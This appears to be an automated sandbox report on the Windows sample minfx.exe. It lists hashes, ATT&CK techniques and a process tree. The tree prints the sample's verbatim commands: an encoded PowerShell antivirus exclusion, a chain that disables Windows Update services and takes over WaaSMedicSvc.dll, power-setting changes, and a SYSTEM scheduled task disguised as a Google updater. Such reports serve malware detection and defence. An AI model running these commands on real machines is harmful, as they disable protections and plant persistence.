529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

General

Target

minfx.exe
Size

4.2MB
MD5

8268ff95b3aaea6d6de8f02a73c323d2
SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Score

8^/10

discovery evasion exploit

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1036 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1296 takeown.exe
688 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1784 cmd.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1296 takeown.exe
688 icacls.exe

pid	process
1036	updater.exe

pid	process
1296	takeown.exe
688	icacls.exe

pid	process
1784	cmd.exe

pid	process
1296	takeown.exe
688	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1608 schtasks.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.execonhost.exe

pid process

1632 powershell.exe
1092 conhost.exe

pid	process
1608	schtasks.exe

pid	process
1632	powershell.exe
1092	conhost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeShutdownPrivilege	1544	powercfg.exe
Token: SeShutdownPrivilege	896	powercfg.exe
Token: SeShutdownPrivilege	1784	powercfg.exe
Token: SeShutdownPrivilege	364	powercfg.exe
Token: SeDebugPrivilege	1092	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

minfx.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1992 wrote to memory of 1092	1992	minfx.exe	conhost.exe
PID 1992 wrote to memory of 1092	1992	minfx.exe	conhost.exe
PID 1992 wrote to memory of 1092	1992	minfx.exe	conhost.exe
PID 1992 wrote to memory of 1092	1992	minfx.exe	conhost.exe
PID 1092 wrote to memory of 1836	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 1836	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 1836	1092	conhost.exe	cmd.exe
PID 1836 wrote to memory of 1632	1836	cmd.exe	powershell.exe
PID 1836 wrote to memory of 1632	1836	cmd.exe	powershell.exe
PID 1836 wrote to memory of 1632	1836	cmd.exe	powershell.exe
PID 1092 wrote to memory of 588	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 588	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 588	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 776	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 776	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 776	1092	conhost.exe	cmd.exe
PID 588 wrote to memory of 1156	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1156	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1156	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1660	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1660	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1660	588	cmd.exe	sc.exe
PID 776 wrote to memory of 1544	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 1544	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 1544	776	cmd.exe	powercfg.exe
PID 588 wrote to memory of 1000	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1000	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1000	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1760	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1760	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1760	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1620	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1620	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1620	588	cmd.exe	sc.exe
PID 776 wrote to memory of 896	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 896	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 896	776	cmd.exe	powercfg.exe
PID 588 wrote to memory of 1696	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1696	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1696	588	cmd.exe	sc.exe
PID 776 wrote to memory of 1784	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 1784	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 1784	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 364	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 364	776	cmd.exe	powercfg.exe
PID 776 wrote to memory of 364	776	cmd.exe	powercfg.exe
PID 588 wrote to memory of 1444	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1444	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1444	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1736	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1736	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1736	588	cmd.exe	sc.exe
PID 1092 wrote to memory of 2032	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 2032	1092	conhost.exe	cmd.exe
PID 1092 wrote to memory of 2032	1092	conhost.exe	cmd.exe
PID 588 wrote to memory of 1100	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1100	588	cmd.exe	sc.exe
PID 588 wrote to memory of 1100	588	cmd.exe	sc.exe
PID 2032 wrote to memory of 1608	2032	cmd.exe	schtasks.exe
PID 2032 wrote to memory of 1608	2032	cmd.exe	schtasks.exe
PID 2032 wrote to memory of 1608	2032	cmd.exe	schtasks.exe
PID 588 wrote to memory of 904	588	cmd.exe	sc.exe
PID 588 wrote to memory of 904	588	cmd.exe	sc.exe
PID 588 wrote to memory of 904	588	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\minfx.exe
"C:\Users\Admin\AppData\Local\Temp\minfx.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:1156

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:1660

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:1000

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:1760

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:1620

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:1696

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:1444

C:\Windows\system32\sc.exe
sc config bits start= disabled
4⤵
PID:1736

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
4⤵
PID:1100

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
4⤵
PID:904

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
4⤵
PID:1576

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
4⤵
PID:1772

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
4⤵
PID:1832

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:660

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:692

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:688

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
4⤵
PID:580

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
4⤵
PID:1844

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
PID:908

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
PID:1436

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
PID:456

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
PID:1668

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
4⤵
PID:932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
4⤵
PID:1320

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
4⤵
PID:1960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
4⤵
PID:1988

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
4⤵
PID:1004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:776

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Creates scheduled task(s)
PID:1608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
- Loads dropped DLL
PID:1784

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
4⤵
- Executes dropped EXE
PID:1036

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/364-75-0x0000000000000000-mapping.dmp

Download
memory/456-93-0x0000000000000000-mapping.dmp

Download
memory/580-89-0x0000000000000000-mapping.dmp

Download
memory/588-64-0x0000000000000000-mapping.dmp

Download
memory/660-85-0x0000000000000000-mapping.dmp

Download
memory/688-88-0x0000000000000000-mapping.dmp

Download
memory/692-86-0x0000000000000000-mapping.dmp

Download
memory/776-65-0x0000000000000000-mapping.dmp

Download
memory/824-101-0x0000000000000000-mapping.dmp

Download
memory/896-72-0x0000000000000000-mapping.dmp

Download
memory/904-81-0x0000000000000000-mapping.dmp

Download
memory/908-91-0x0000000000000000-mapping.dmp

Download
memory/932-95-0x0000000000000000-mapping.dmp

Download
memory/1000-69-0x0000000000000000-mapping.dmp

Download
memory/1004-99-0x0000000000000000-mapping.dmp

Download
memory/1036-104-0x0000000000000000-mapping.dmp

Download
memory/1092-56-0x000000001B680000-0x000000001BAA0000-memory.dmp

Filesize
4.1MB

Download
memory/1092-54-0x0000000000150000-0x000000000058E000-memory.dmp

Filesize
4.2MB

Download
memory/1092-55-0x000000001BAC0000-0x000000001BEFE000-memory.dmp

Filesize
4.2MB

Download
memory/1092-57-0x000007FEFB871000-0x000007FEFB873000-memory.dmp

Filesize
8KB

Download
memory/1100-79-0x0000000000000000-mapping.dmp

Download
memory/1156-66-0x0000000000000000-mapping.dmp

Download
memory/1296-87-0x0000000000000000-mapping.dmp

Download
memory/1320-96-0x0000000000000000-mapping.dmp

Download
memory/1436-92-0x0000000000000000-mapping.dmp

Download
memory/1444-76-0x0000000000000000-mapping.dmp

Download
memory/1512-100-0x0000000000000000-mapping.dmp

Download
memory/1544-68-0x0000000000000000-mapping.dmp

Download
memory/1576-82-0x0000000000000000-mapping.dmp

Download
memory/1608-80-0x0000000000000000-mapping.dmp

Download
memory/1620-71-0x0000000000000000-mapping.dmp

Download
memory/1632-63-0x00000000026EB000-0x000000000270A000-memory.dmp

Filesize
124KB

Download
memory/1632-59-0x0000000000000000-mapping.dmp

Download
memory/1632-61-0x000007FEED860000-0x000007FEEE3BD000-memory.dmp

Filesize
11.4MB

Download
memory/1632-62-0x00000000026E4000-0x00000000026E7000-memory.dmp

Filesize
12KB

Download
memory/1660-67-0x0000000000000000-mapping.dmp

Download
memory/1668-94-0x0000000000000000-mapping.dmp

Download
memory/1696-73-0x0000000000000000-mapping.dmp

Download
memory/1736-77-0x0000000000000000-mapping.dmp

Download
memory/1760-70-0x0000000000000000-mapping.dmp

Download
memory/1772-83-0x0000000000000000-mapping.dmp

Download
memory/1784-74-0x0000000000000000-mapping.dmp

Download
memory/1784-102-0x0000000000000000-mapping.dmp

Download
memory/1832-84-0x0000000000000000-mapping.dmp

Download
memory/1836-58-0x0000000000000000-mapping.dmp

Download
memory/1844-90-0x0000000000000000-mapping.dmp

Download
memory/1960-97-0x0000000000000000-mapping.dmp

Download
memory/1988-98-0x0000000000000000-mapping.dmp

Download
memory/2032-78-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads